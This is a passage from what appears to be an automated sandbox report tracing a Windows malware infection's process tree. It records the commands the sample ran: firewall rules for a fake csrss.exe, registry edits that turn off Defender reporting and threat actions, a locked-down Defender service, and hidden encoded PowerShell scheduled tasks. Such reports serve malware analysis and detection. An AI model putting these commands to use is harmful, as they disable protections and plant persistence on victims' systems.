                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 648
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:428
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 716
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:880
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -nologo -noprofile
                                                                          5⤵
                                                                            PID:684
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 780
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:4884
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 664
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:3032
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 580
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:312
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 600
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:1636
                                                                          • C:\Windows\System32\cmd.exe
                                                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                            5⤵
                                                                              PID:4236
                                                                              • C:\Windows\system32\netsh.exe
                                                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                6⤵
                                                                                • Modifies Windows Firewall
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:2424
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -nologo -noprofile
                                                                              5⤵
                                                                                PID:4188
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -nologo -noprofile
                                                                                5⤵
                                                                                  PID:932
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 856
                                                                                  5⤵
                                                                                  • Program crash
                                                                                  PID:4908
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 792
                                                                                  5⤵
                                                                                    PID:1568
                                                                              • C:\Users\Admin\Pictures\f8mswtdktOCrSTPqE0dePXTU.exe
                                                                                "C:\Users\Admin\Pictures\f8mswtdktOCrSTPqE0dePXTU.exe" /VERYSILENT
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4544
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-A4AGN.tmp\f8mswtdktOCrSTPqE0dePXTU.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-A4AGN.tmp\f8mswtdktOCrSTPqE0dePXTU.tmp" /SL5="$80064,831488,831488,C:\Users\Admin\Pictures\f8mswtdktOCrSTPqE0dePXTU.exe" /VERYSILENT
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Windows directory
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:2388
                                                                              • C:\Users\Admin\Pictures\lNnmAWGvnuf2LxCIR4EFHnrt.exe
                                                                                "C:\Users\Admin\Pictures\lNnmAWGvnuf2LxCIR4EFHnrt.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:2432
                                                                              • C:\Users\Admin\Pictures\ww3dp3HcFtNg4y2J1XPcbvWR.exe
                                                                                "C:\Users\Admin\Pictures\ww3dp3HcFtNg4y2J1XPcbvWR.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:4736
                                                                              • C:\Users\Admin\Pictures\Fnp2fLmmxdGPmLqWciOsVi7F.exe
                                                                                "C:\Users\Admin\Pictures\Fnp2fLmmxdGPmLqWciOsVi7F.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3140
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS9952.tmp\Install.exe
                                                                                  .\Install.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2000
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS9CBD.tmp\Install.exe
                                                                                    .\Install.exe /mGaXdidI "385118" /S
                                                                                    5⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Checks for any installed AV software in registry
                                                                                    • Drops file in System32 directory
                                                                                    • Enumerates system info in registry
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2264
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                      6⤵
                                                                                        PID:3384
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                          7⤵
                                                                                            PID:4388
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                              8⤵
                                                                                                PID:5072
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                8⤵
                                                                                                  PID:5116
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                              6⤵
                                                                                                PID:4888
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                  7⤵
                                                                                                    PID:4572
                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                      8⤵
                                                                                                        PID:4084
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                        8⤵
                                                                                                          PID:3672
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "gmCHrMjkc" /SC once /ST 00:42:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                      6⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:3588
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /run /I /tn "gmCHrMjkc"
                                                                                                      6⤵
                                                                                                        PID:3092
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "gmCHrMjkc"
                                                                                                        6⤵
                                                                                                          PID:2112
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HUGXBqX.exe\" cj /QNsite_idKLR 385118 /S" /V1 /F
                                                                                                          6⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:884
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                1⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1468
                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  2⤵
                                                                                                    PID:3852
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                  1⤵
                                                                                                    PID:3832
                                                                                                  • \??\c:\windows\system32\gpscript.exe
                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                    1⤵
                                                                                                      PID:312
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                      1⤵
                                                                                                        PID:4328
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 676
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:1192
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 792
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:3080
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -nologo -noprofile
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1672
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 712
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:3716
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 672
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:4412
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 636
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:4216
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 596
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:4492
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 408
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:2404
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 336
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:4680
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 356
                                                                                                        1⤵
                                                                                                        • Program crash
                                                                                                        PID:5116
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                        1⤵
                                                                                                        • Modifies Windows Firewall
                                                                                                        PID:1636
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\assistant_installer.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1452614,0x1452620,0x145262c
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4768
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                        1⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:4380
                                                                                                      • C:\Windows\windefender.exe
                                                                                                        C:\Windows\windefender.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4576
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                        1⤵
                                                                                                          PID:1332
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HUGXBqX.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HUGXBqX.exe cj /QNsite_idKLR 385118 /S
                                                                                                          1⤵
                                                                                                            PID:4356
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:216
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:648
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:3572
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:4052
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:3080
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:4636
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3192
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:880
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3232
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:1860
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3284
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3672
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2336
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4428
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:3252
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:236
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4512
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5076
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:312
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1380
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1568
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2484
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4324
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4380
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:932
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4256
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            PID:884
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
